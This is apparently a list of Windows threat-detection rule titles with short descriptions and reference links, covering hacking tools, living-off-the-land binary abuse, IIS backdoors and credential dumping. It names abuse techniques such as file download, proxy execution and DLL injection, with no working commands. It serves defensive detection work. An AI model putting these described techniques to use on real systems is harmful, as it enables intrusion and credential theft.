HackTool - PPID Spoofing SelectMyParent Tool Execution Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent https://pentestlab.blog/2020/02/24/parent-pid-spoofing/, https://www.picussecurity.com/resource/blog/how-to-detect-parent-pid-ppid-spoofing-attacks, https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing, https://www.virustotal.com/gui/search/filename%253A*spoof*%2520filename%253A*ppid*/files
HackTool - SharPersist Execution Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms https://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit, https://github.com/mandiant/SharPersist
HackTool - SharpEvtMute Execution Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs https://github.com/bats3c/EvtMute
HackTool - SharpLdapWhoami Execution Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller https://github.com/bugch3ck/SharpLdapWhoami
HackTool - SharpMove Tool Execution Detects the execution of SharpMove, a .NET utility performing multiple tasks such as "Task Creation", "SCM" query, VBScript execution using WMI via its PE metadata and command line options. https://github.com/0xthirteen/SharpMove/, https://pentestlab.blog/tag/sharpmove/
HackTool - SharpUp PrivEsc Tool Execution Detects the use of SharpUp, a tool for local privilege escalation https://github.com/GhostPack/SharpUp
HackTool - SharpView Execution Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems https://github.com/tevora-threat/SharpView/, https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview
HackTool - SharpWSUS/WSUSpendu Execution Detects the execution of SharpWSUS or WSUSpendu, utilities that allow for lateral movement through WSUS. Windows Server Update Services (WSUS) is a critical component of Windows systems and is frequently configured in a way that allows an attacker to circumvent internal networking limitations. https://labs.nettitude.com/blog/introducing-sharpwsus/, https://github.com/nettitude/SharpWSUS, https://web.archive.org/web/20210512154016/https://github.com/AlsidOfficial/WSUSpendu/blob/master/WSUSpendu.ps1
HackTool - SharpChisel Execution Detects usage of SharpChisel via its command line arguments https://github.com/shantanu561993/SharpChisel, https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/
HackTool - SharpImpersonation Execution Detects execution of the SharpImpersonation tool, which can be used to manipulate tokens on Windows computers remotely (PsExec/WmiExec) or interactively https://s3cur3th1ssh1t.github.io/SharpImpersonation-Introduction/, https://github.com/S3cur3Th1sSh1t/SharpImpersonation
HackTool - SharpDPAPI Execution Detects the execution of the SharpDPAPI tool based on CommandLine flags and PE metadata. SharpDPAPI is a C# port of some DPAPI functionality from the Mimikatz project. https://github.com/GhostPack/SharpDPAPI
HackTool - SharpLDAPmonitor Execution Detects execution of SharpLDAPmonitor, which can monitor the creation, deletion and modification of LDAP objects. https://github.com/p0dalirius/LDAPmonitor
HackTool - SILENTTRINITY Stager Execution Detects SILENTTRINITY stager use via PE metadata https://github.com/byt3bl33d3r/SILENTTRINITY
HackTool - Sliver C2 Implant Activity Pattern Detects process activity patterns as seen being used by Sliver C2 framework implants https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/implant/sliver/shell/shell_windows.go#L36, https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/
HackTool - SOAPHound Execution Detects the execution of SOAPHound, a .NET tool for collecting Active Directory data, using specific command-line arguments that may indicate an attempt to extract sensitive AD information. https://github.com/FalconForceTeam/SOAPHound, https://medium.com/falconforce/soaphound-tool-to-collect-active-directory-data-via-adws-165aca78288c
HackTool - Stracciatella Execution Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics. https://github.com/mgeeky/Stracciatella
HackTool - SysmonEOP Execution Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120 https://github.com/Wh04m1001/SysmonEoP
HackTool - TruffleSnout Execution Detects the use of TruffleSnout.exe, an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low-noise enumeration. https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md, https://github.com/dsnezhkov/TruffleSnout, https://github.com/dsnezhkov/TruffleSnout/blob/master/TruffleSnout/Docs/USAGE.md
HackTool - UACMe Akagi Execution Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata https://github.com/hfiref0x/UACME
HackTool - Windows Credential Editor (WCE) Execution Detects the use of Windows Credential Editor (WCE) https://www.ampliasecurity.com/research/windows-credentials-editor/
HackTool - winPEAS Execution WinPEAS is a script that searches for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz https://github.com/carlospolop/PEASS-ng, https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation
HackTool - WinPwn Execution Detects commandline keywords indicative of potential usage of the tool WinPwn, a tool for Windows and Active Directory reconnaissance and exploitation. https://github.com/S3cur3Th1sSh1t/WinPwn, https://www.publicnow.com/view/EB87DB49C654D9B63995FAD4C9DE3D3CC4F6C3ED?1671634841, https://reconshell.com/winpwn-tool-for-internal-windows-pentesting-and-ad-security/, https://github.com/redcanaryco/atomic-red-team/blob/4d6c4e8e23d465af7a2388620cfe3f8c76e16cf0/atomics/T1082/T1082.md, https://grep.app/search?q=winpwn&filter[repo][0]=redcanaryco/atomic-red-team
HackTool - Wmiexec Default Powershell Command Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script https://github.com/fortra/impacket/blob/f4b848fa27654ca95bc0f4c73dbba8b9c2c9f30a/examples/wmiexec.py
HackTool - XORDump Execution Detects suspicious use of XORDump process memory dumping utility https://github.com/audibleblink/xordump
Suspicious ZipExec Execution ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file. https://twitter.com/SBousseaden/status/1451237393017839616, https://github.com/Tylous/ZipExec
Suspicious Execution of Hostname Use of hostname to get information https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-6---hostname-discovery-windows, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/hostname
Suspicious HWP Sub Processes Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate exploitation https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/, https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1, https://twitter.com/cyberwar_15/status/1187287262054076416, https://blog.alyac.co.kr/1901, https://en.wikipedia.org/wiki/Hangul_(word_processor)
Potential Fake Instance Of Hxtsr.EXE Executed HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications. HxTsr.exe is part of Outlook apps, because it resides in a hidden "WindowsApps" subfolder of "C:\Program Files". Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe Internal Research
Use Icacls to Hide File to Everyone Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files https://app.any.run/tasks/1df999e6-1cb8-45e3-8b61-499d1b7d5a9b/
File Download And Execution Via IEExec.EXE Detects execution of the IEExec utility to download and execute files https://lolbas-project.github.io/lolbas/Binaries/Ieexec/
Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location Detects the use of iexpress.exe to create binaries via Self Extraction Directive (SED) files located in potentially suspicious locations. This behavior has been observed in-the-wild by different threat actors. https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html, https://en.wikipedia.org/wiki/IExpress, https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/, https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior
Disable Windows IIS HTTP Logging Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union) https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.002/T1562.002.md#atomic-test-1---disable-windows-iis-http-logging
Microsoft IIS Service Account Password Dumped Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords https://www.elastic.co/guide/en/security/current/microsoft-iis-service-account-password-dumped.html, https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA, https://www.netspi.com/blog/technical/network-penetration-testing/decrypting-iis-passwords-to-break-out-of-the-dmz-part-2/
IIS Native-Code Module Command Line Installation Detects suspicious IIS native-code module installations via command line https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/, https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/
Suspicious IIS URL GlobalRules Rewrite Via AppCmd Detects usage of "appcmd" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells. https://twitter.com/malmoeb/status/1616702107242971144, https://learn.microsoft.com/en-us/answers/questions/739120/how-to-add-re-write-global-rule-with-action-type-r
Microsoft IIS Connection Strings Decryption Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or similar can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password, using the aspnet_regiis command. https://www.elastic.co/guide/en/security/current/microsoft-iis-connection-strings-decryption.html
Suspicious IIS Module Registration Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/
C# IL Code Compilation Via Ilasm.EXE Detects the use of "Ilasm.EXE" in order to compile C# intermediate (IL) code to EXE or DLL. https://lolbas-project.github.io/lolbas/Binaries/Ilasm/, https://www.echotrail.io/insights/search/ilasm.exe
ImagingDevices Unusual Parent/Child Processes Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity https://thedfirreport.com/2022/09/26/bumblebee-round-two/
Arbitrary File Download Via IMEWDBLD.EXE Detects usage of "IMEWDBLD.exe" to download arbitrary files https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download, https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/
InfDefaultInstall.exe .inf Execution Executes an SCT script using scrobj.dll from a command entered into a specially prepared INF file. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md#atomic-test-4---infdefaultinstallexe-inf-execution, https://lolbas-project.github.io/lolbas/Binaries/Infdefaultinstall/
File Download Via InstallUtil.EXE Detects use of .NET InstallUtil.exe in order to download arbitrary files. The files will be written to "%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\" https://github.com/LOLBAS-Project/LOLBAS/pull/239
Suspicious Execution of InstallUtil Without Log Uses the .NET InstallUtil.exe application in order to execute an image without logging https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/, https://learn.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool
Suspicious Shells Spawn by Java Utility Keytool Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation) https://redcanary.com/blog/intelligence-insights-december-2021, https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html
Suspicious Child Process Of Manage Engine ServiceDesk Detects suspicious child processes of the "Manage Engine ServiceDesk Plus" Java web service https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/, https://github.com/horizon3ai/CVE-2022-47966/blob/3a51c6b72ebbd87392babd955a8fbeaee2090b35/CVE-2022-47966.py, https://blog.viettelcybersecurity.com/saml-show-stopper/
Java Running with Remote Debugging Detects a JAVA process running with remote debugging allowing more than just localhost to connect https://dzone.com/articles/remote-debugging-java-applications-with-jdwp
Suspicious Processes Spawned by Java.EXE Detects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j) https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/
Shell Process Spawned by Java.EXE Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation) https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/
Suspicious SysAidServer Child Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions) https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/
JScript Compiler Execution Detects the execution of "jsc.exe" (JScript Compiler). Attackers might abuse this to compile JScript files on the fly and bypass application whitelisting. https://lolbas-project.github.io/lolbas/Binaries/Jsc/, https://www.phpied.com/make-your-javascript-a-windows-exe/, https://twitter.com/DissectMalware/status/998797808907046913
Kavremover Dropped Binary LOLBIN Usage Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries. https://nasbench.medium.com/lolbined-using-kaspersky-endpoint-security-kes-installer-to-execute-arbitrary-commands-1c999f1b7fea
Windows Kernel Debugger Execution Detects execution of the Windows Kernel Debugger "kd.exe". Internal Research
Computer Password Change Via Ksetup.EXE Detects password change for the computer's domain account or host principal via "ksetup.exe" https://twitter.com/Oddvarmoe/status/1641712700605513729, https://learn.microsoft.com/en-gb/windows-server/administration/windows-commands/ksetup
Potentially Suspicious Child Process of KeyScrambler.exe Detects potentially suspicious child processes of KeyScrambler.exe https://twitter.com/DTCERT/status/1712785421845790799
Active Directory Structure Export Via Ldifde.EXE Detects the execution of "ldifde.exe" in order to export organizational Active Directory structure. https://businessinsights.bitdefender.com/deep-dive-into-a-backdoordiplomacy-attack-a-study-of-an-attackers-toolkit, https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)
Logged-On User Password Change Via Ksetup.EXE Detects a password change for the logged-on user via "ksetup.exe" https://learn.microsoft.com/en-gb/windows-server/administration/windows-commands/ksetup
Import LDAP Data Interchange Format File Via Ldifde.EXE Detects the execution of "Ldifde.exe" with the import flag "-i". This can be abused to include HTTP-based arguments which allow the arbitrary download of files from a remote server. https://twitter.com/0gtweet/status/1564968845726580736, https://strontic.github.io/xcyclopedia/library/ldifde.exe-979DE101F5059CEC1D2C56967CA2BAC0.html, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)
Uncommon Link.EXE Parent Process Detects an uncommon parent process of "LINK.EXE". Link.EXE is the Microsoft incremental linker, a utility usually bundled with a Visual Studio installation. Multiple utilities often found in the same folder (editbin.exe, dumpbin.exe, lib.exe, etc.) have a hardcoded call to the "LINK.EXE" binary without checking its validity. This would allow an attacker to sideload any binary with the name "link.exe" if one of the aforementioned tools gets executed from a different location. By filtering the known locations of such utilities we can spot uncommon parent processes of LINK.EXE that might be suspicious or malicious. https://twitter.com/0gtweet/status/1560732860935729152
Rebuild Performance Counter Values Via Lodctr.EXE Detects the execution of "lodctr.exe" to rebuild the performance counter registry values. This can be abused by attackers by providing a malicious config file to overwrite performance counter configuration to confuse and evade monitoring and security solutions. https://learn.microsoft.com/en-us/windows/security/identity-protection/virtual-smart-cards/virtual-smart-card-tpmvscmgr
Suspicious Windows Trace ETW Session Tamper Via Logman.EXE Detects the execution of "logman" utility in order to disable or delete Windows trace sessions https://twitter.com/0gtweet/status/1359039665232306183?s=21, https://ss64.com/nt/logman.html
Suspicious CustomShellHost Execution Detects the execution of CustomShellHost binary where the child isn't located in 'C:\Windows\explorer.exe' https://github.com/LOLBAS-Project/LOLBAS/pull/180, https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/
LOLBAS Data Exfiltration by DataSvcUtil.exe Detects when a user performs data exfiltration by using DataSvcUtil.exe https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6, https://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe, https://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services, https://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services, https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/
Devtoolslauncher.exe Executes Specified Binary Devtoolslauncher.exe executes another binary https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher/, https://twitter.com/_felamos/status/1179811992841797632
DeviceCredentialDeployment Execution Detects the execution of DeviceCredentialDeployment to hide a process from view https://github.com/LOLBAS-Project/LOLBAS/pull/147
Suspicious Diantz Alternate Data Stream Execution Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file. https://lolbas-project.github.io/lolbas/Binaries/Diantz/
Suspicious Diantz Download and Compress Into a CAB File Download and compress a remote file and store it in a cab file on local machine. https://lolbas-project.github.io/lolbas/Binaries/Diantz/
Suspicious Extrac32 Execution Download or Copy file with Extrac32 https://lolbas-project.github.io/lolbas/Binaries/Extrac32/
Suspicious Extrac32 Alternate Data Stream Execution Extract data from cab file and hide it in an alternate data stream https://lolbas-project.github.io/lolbas/Binaries/Extrac32/
Potential Reconnaissance Activity Via GatherNetworkInfo.VBS Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs", which can be used to gather information about the target machine https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs, https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government
Gpscript Execution Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/, https://lolbas-project.github.io/lolbas/Binaries/Gpscript/
Ie4uinit Lolbin Use From Invalid Path Detect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/, https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
Launch-VsDevShell.PS1 Proxy Execution Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands. https://twitter.com/nas_bench/status/1535981653239255040
Potential Manage-bde.wsf Abuse To Proxy Execution Detects potential abuse of the "manage-bde.wsf" script as a LOLBIN to proxy execution https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/, https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712, https://twitter.com/bohops/status/980659399495741441, https://twitter.com/JohnLaTwC/status/1223292479270600706, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md
Mavinject Inject DLL Into Running Process Detects process injection using the signed Windows tool "Mavinject" via the "INJECTRUNNING" flag https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md, https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e, https://twitter.com/gN3mes1s/status/941315826107510784, https://reaqta.com/2017/12/mavinject-microsoft-injector/, https://twitter.com/Hexacorn/status/776122138063409152, https://github.com/SigmaHQ/sigma/issues/3742, https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection
MpiExec Lolbin Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary https://twitter.com/mrd0x/status/1465058133303246867, https://learn.microsoft.com/en-us/powershell/high-performance-computing/mpiexec?view=hpc19-ps
Execute Files with Msdeploy.exe Detects file execution using the msdeploy.exe lolbin https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/, https://twitter.com/pabraeken/status/995837734379032576, https://twitter.com/pabraeken/status/999090532839313408
Execute MSDT Via Answer File Detects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility tab) https://lolbas-project.github.io/lolbas/Binaries/Msdt/
Use of OpenConsole Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting https://twitter.com/nas_bench/status/1537563834478645252
OpenWith.exe Executes Specified Binary OpenWith.exe executes another binary https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Openwith.yml, https://twitter.com/harr0ey/status/991670870384021504
Use of Pcalua For Execution Detects execution of commands and binaries from the context of the Program Compatibility Assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting. https://lolbas-project.github.io/lolbas/Binaries/Pcalua/, https://pentestlab.blog/2020/07/06/indirect-command-execution/
Indirect Command Execution By Program Compatibility Wizard Detect indirect command execution via Program Compatibility Assistant pcwrun.exe https://twitter.com/pabraeken/status/991335019833708544, https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/
Execute Pcwrun.EXE To Leverage Follina Detects indirect command execution via Program Compatibility Assistant "pcwrun.exe" leveraging the follina (CVE-2022-30190) vulnerability https://twitter.com/nas_bench/status/1535663791362519040
Code Execution via Pcwutl.dll Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library. https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/, https://twitter.com/harr0ey/status/989617817849876488
Execute Code with Pester.bat as Parent Detects code execution via Pester.bat (Pester - PowerShell module for testing) https://twitter.com/Oddvarmoe/status/993383596244258816, https://twitter.com/_st0pp3r_/status/1560072680887525378
Execute Code with Pester.bat Detects code execution via Pester.bat (Pester - PowerShell module for testing) https://twitter.com/Oddvarmoe/status/993383596244258816, https://github.com/api0cradle/LOLBAS/blob/d148d278f5f205ce67cfaf49afdfb68071c7252a/OSScripts/pester.md
PrintBrm ZIP Creation of Extraction Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation. https://lolbas-project.github.io/lolbas/Binaries/PrintBrm/
Pubprn.vbs Proxy Execution Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands. https://lolbas-project.github.io/lolbas/Scripts/Pubprn/
DLL Execution via Rasautou.exe Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p. https://lolbas-project.github.io/lolbas/Binaries/Rasautou/, https://github.com/fireeye/DueDLLigence, https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html
REGISTER_APP.VBS Proxy Execution Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application. https://twitter.com/sblmsrsn/status/1456613494783160325?s=20
Use of Remote.exe Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files. https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/
Replace.exe Usage Detects the use of Replace.exe which can be used to replace file with another file https://lolbas-project.github.io/lolbas/Binaries/Replace/, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/replace
Lolbin Runexehelper Use As Proxy Detect usage of the "runexehelper.exe" binary as a proxy to launch other programs https://twitter.com/0gtweet/status/1206692239839289344, https://lolbas-project.github.io/lolbas/Binaries/Runexehelper/
Suspicious Runscripthelper.exe Detects execution of powershell scripts via Runscripthelper.exe https://lolbas-project.github.io/lolbas/Binaries/Runscripthelper/
Use of Scriptrunner.exe The "ScriptRunner.exe" binary can be abused to proxy execution through it and bypass possible whitelisting https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/
Using SettingSyncHost.exe as LOLBin Detects using SettingSyncHost.exe to run hijacked binary https://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin
Use Of The SFTP.EXE Binary As A LOLBIN Detects the usage of the "sftp.exe" binary as a LOLBIN by abusing the "-D" flag https://github.com/LOLBAS-Project/LOLBAS/pull/264
Suspicious Certreq Command to Download Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files https://lolbas-project.github.io/lolbas/Binaries/Certreq/
Suspicious Driver Install by pnputil.exe Detects when a possibly suspicious driver is being installed via the pnputil.exe lolbin https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax, https://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html
Suspicious GrpConv Execution Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors https://twitter.com/0gtweet/status/1526833181831200770
Dumping Process via Sqldumper.exe Detects process dump via legitimate sqldumper.exe binary https://twitter.com/countuponsec/status/910977826853068800, https://twitter.com/countuponsec/status/910969424215232518, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/
SyncAppvPublishingServer Execute Arbitrary PowerShell Code Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md, https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/
SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md, https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/
Potential DLL Injection Or Execution Using Tracker.exe Detects potential DLL injection and execution using "Tracker.exe" https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/
Use of TTDInject.exe Detects the execution of TTDInject.exe, which is used by Windows 10 v1809 and newer for time travel debugging (underlying call of tttracer.exe) https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/
Time Travel Debugging Utility Usage Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe. https://lolbas-project.github.io/lolbas/Binaries/Tttracer/, https://twitter.com/mattifestation/status/1196390321783025666, https://twitter.com/oulusoyum/status/1191329746069655553
Lolbin Unregmp2.exe Use As Proxy Detect usage of the "unregmp2.exe" binary as a proxy to launch a custom version of "wmpnscfg.exe" https://lolbas-project.github.io/lolbas/Binaries/Unregmp2/
UtilityFunctions.ps1 Proxy Dll Detects the use of a Microsoft signed script executing a managed DLL with PowerShell. https://lolbas-project.github.io/lolbas/Scripts/UtilityFunctions/
Use of VisualUiaVerifyNative.exe VisualUiaVerifyNative.exe is a Windows SDK binary that can be used for AWL bypass and is listed in Microsoft's recommended block rules. https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/design/applications-that-can-bypass-wdac, https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/, https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad
Visual Basic Command Line Compiler Usage Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter. https://lolbas-project.github.io/lolbas/Binaries/Vbc/
Use of VSIISExeLauncher.exe The "VSIISExeLauncher.exe" binary, part of Visual Studio/VS Code, can be used to execute arbitrary binaries https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSIISExeLauncher/
Use of Wfc.exe The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules. https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wfc/, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/design/applications-that-can-bypass-wdac
Potential Register_App.Vbs LOLScript Abuse Detects potential abuse of the "register_app.vbs" script that is part of the Windows SDK. The script offers the capability to register a new VSS/VDS Provider as a COM+ application. Attackers can use this to install malicious DLLs for persistence and execution. https://twitter.com/sblmsrsn/status/1456613494783160325?s=20, https://github.com/microsoft/Windows-classic-samples/blob/7cbd99ac1d2b4a0beffbaba29ea63d024ceff700/Samples/Win7Samples/winbase/vss/vsssampleprovider/register_app.vbs
Potential Credential Dumping Via LSASS Process Clone Detects a suspicious LSASS process clone that could be a sign of credential dumping activity https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/, https://twitter.com/Hexacorn/status/1420053502554951689, https://twitter.com/SBousseaden/status/1464566846594691073?s=20
Potential Mftrace.EXE Abuse Detects child processes of the "Trace log generation tool for Media Foundation Tools" (Mftrace.exe), which can be abused to execute arbitrary binaries. https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mftrace/
MMC20 Lateral Movement Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of "-Embedding" as a child of svchost.exe https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/, https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view?usp=sharing
MMC Spawning Windows Shell Detects a Windows command line executable started from MMC https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
